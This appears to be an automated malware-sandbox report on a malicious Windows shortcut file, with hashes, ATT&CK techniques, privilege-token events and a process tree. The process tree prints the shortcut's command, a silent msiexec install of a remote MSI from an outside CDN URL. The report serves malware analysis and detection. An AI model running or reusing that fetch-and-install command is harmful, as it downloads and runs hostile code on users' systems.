aedf0fea2e47d087b9b987a0209bed0b7c7878174b18ababfb8d01cfc76f269e

Resubmissions

19/11/2024, 13:47

241119-q32g8s1pen 7

19/11/2024, 13:47

241119-q3kjqaxdrj 7

Analysis

max time kernel
15s
max time network
16s
platform
windows7_x64
resource
win7-20241023-en
resource tags

arch:x64arch:x86image:win7-20241023-enlocale:en-usos:windows7-x64system
submitted
19/11/2024, 13:47

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

aedf0fea2e47d087b9b987a0209bed0b7c7878174b18ababfb8d01cfc76f269e.lnk
Size

948B
MD5

0879d4ade73bc83521fb8dc947cd3219
SHA1

304e8ad232651e6a0116744748dfa1b2587e5407
SHA256

aedf0fea2e47d087b9b987a0209bed0b7c7878174b18ababfb8d01cfc76f269e
SHA512

2c982d02b5b28bf71c68da088047c02c30b97739b7a56ebb4c2a41a2e33e965bcdd191f0684308d2d1bf9b7a992d29f16148a83219e6adb2d7f567ff89ea2501

Score

7^/10

discovery

Malware Config

Signatures

Use of msiexec (install) with remote resource 1 IoCs

pid	Process
2888	msiexec.exe

Blocklisted process makes network request 1 IoCs

flow	pid	Process
5	2816	msiexec.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
2888	msiexec.exe

Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

pid	Process
2888	msiexec.exe

Suspicious use of AdjustPrivilegeToken 34 IoCs

description	pid	Process
Token: SeShutdownPrivilege	2888	msiexec.exe
Token: SeIncreaseQuotaPrivilege	2888	msiexec.exe
Token: SeRestorePrivilege	2816	msiexec.exe
Token: SeTakeOwnershipPrivilege	2816	msiexec.exe
Token: SeSecurityPrivilege	2816	msiexec.exe
Token: SeCreateTokenPrivilege	2888	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	2888	msiexec.exe
Token: SeLockMemoryPrivilege	2888	msiexec.exe
Token: SeIncreaseQuotaPrivilege	2888	msiexec.exe
Token: SeMachineAccountPrivilege	2888	msiexec.exe
Token: SeTcbPrivilege	2888	msiexec.exe
Token: SeSecurityPrivilege	2888	msiexec.exe
Token: SeTakeOwnershipPrivilege	2888	msiexec.exe
Token: SeLoadDriverPrivilege	2888	msiexec.exe
Token: SeSystemProfilePrivilege	2888	msiexec.exe
Token: SeSystemtimePrivilege	2888	msiexec.exe
Token: SeProfSingleProcessPrivilege	2888	msiexec.exe
Token: SeIncBasePriorityPrivilege	2888	msiexec.exe
Token: SeCreatePagefilePrivilege	2888	msiexec.exe
Token: SeCreatePermanentPrivilege	2888	msiexec.exe
Token: SeBackupPrivilege	2888	msiexec.exe
Token: SeRestorePrivilege	2888	msiexec.exe
Token: SeShutdownPrivilege	2888	msiexec.exe
Token: SeDebugPrivilege	2888	msiexec.exe
Token: SeAuditPrivilege	2888	msiexec.exe
Token: SeSystemEnvironmentPrivilege	2888	msiexec.exe
Token: SeChangeNotifyPrivilege	2888	msiexec.exe
Token: SeRemoteShutdownPrivilege	2888	msiexec.exe
Token: SeUndockPrivilege	2888	msiexec.exe
Token: SeSyncAgentPrivilege	2888	msiexec.exe
Token: SeEnableDelegationPrivilege	2888	msiexec.exe
Token: SeManageVolumePrivilege	2888	msiexec.exe
Token: SeImpersonatePrivilege	2888	msiexec.exe
Token: SeCreateGlobalPrivilege	2888	msiexec.exe

Suspicious use of WriteProcessMemory 5 IoCs

description	pid	Process	procid_target
PID 2412 wrote to memory of 2888	2412	cmd.exe	31
PID 2412 wrote to memory of 2888	2412	cmd.exe	31
PID 2412 wrote to memory of 2888	2412	cmd.exe	31
PID 2412 wrote to memory of 2888	2412	cmd.exe	31
PID 2412 wrote to memory of 2888	2412	cmd.exe	31

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\aedf0fea2e47d087b9b987a0209bed0b7c7878174b18ababfb8d01cfc76f269e.lnk
1⤵
- Suspicious use of WriteProcessMemory
PID:2412
- C:\Windows\system32\msiexec.exe
  "C:\Windows\system32\msiexec.exe" /i https://sextamsi.b-cdn.net/17.msi /quiet /norestart ALLUSERS=1 /lv* unzippingPEDIDONF101204.lnk.txt
  2⤵
  - Use of msiexec (install) with remote resource
  - System Network Configuration Discovery: Internet Connection Discovery
  - Suspicious behavior: CmdExeWriteProcessMemorySpam
  - Suspicious use of AdjustPrivilegeToken
  PID:2888

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Blocklisted process makes network request
- Suspicious use of AdjustPrivilegeToken
PID:2816

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\unzippingPEDIDONF101204.lnk.txt

Filesize
1KB

MD5
a11a8f0863c99f691aeff7c42f6b922b

SHA1
9b0b6e531a9f58e5d124f3ffbe1936cb3bf29361

SHA256
5f860e4e9bc8dae5283bdd9b7f24850dfa305e4a52e136093e375c1331aa6720

SHA512
fc18667201e91f61178efbd59a4b04b6038f52f790aa6ecd406559db7f4075ac53c788990021d534869b3f57c0cd35b66504903d4b1b812367d85ecdd1588a09

Download Submit